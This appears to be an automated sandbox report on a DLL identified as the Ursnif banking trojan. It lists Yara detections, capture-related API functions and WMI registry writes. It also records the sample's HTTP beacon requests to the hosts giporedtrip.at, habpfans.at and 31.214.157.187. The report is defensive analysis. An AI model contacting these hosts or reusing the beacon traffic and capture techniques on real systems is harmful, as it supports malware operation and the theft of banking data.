Source: global traffic HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 3_2_00E33B10
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 3_2_00E34154
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Installs a raw input device (often for capturing keystrokes)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput, 0_2_00730108
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E57B64 GetKeyboardState, 3_2_00E57B64

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: hFGZpat9Mf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
One or more processes crash
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
Contains functionality to shutdown / reboot the system
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007284AC CheckMenuItem,ExitWindowsEx, 0_2_007284AC
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0076B448 0_2_0076B448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E7B448 3_2_00E7B448
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E41FAC 3_2_00E41FAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01082244 3_2_01082244
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00ED17C8 3_2_00ED17C8
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 007064B8 appears 164 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00706408 appears 48 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00704068 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00E16408 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00E164B8 appears 164 times
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072A41C NtdllDefWindowProc_A, 0_2_0072A41C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture, 0_2_0074A9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3A41C NtdllDefWindowProc_A, 3_2_00E3A41C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture, 3_2_00E5A9F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 3_2_010814BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01082465 NtQueryVirtualMemory, 3_2_01082465
PE file contains strange resources
Source: hFGZpat9Mf.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: fadfadfadad.dll Jump to behavior
